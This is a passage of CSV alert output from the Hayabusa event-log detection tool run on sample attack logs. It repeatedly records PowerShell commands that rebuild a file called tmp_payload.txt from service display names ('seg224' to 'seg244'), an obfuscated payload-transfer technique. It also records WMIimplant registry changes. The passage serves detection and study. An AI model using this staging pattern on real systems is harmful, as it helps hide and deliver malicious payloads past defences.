+09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | 
LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx +2021-11-08 
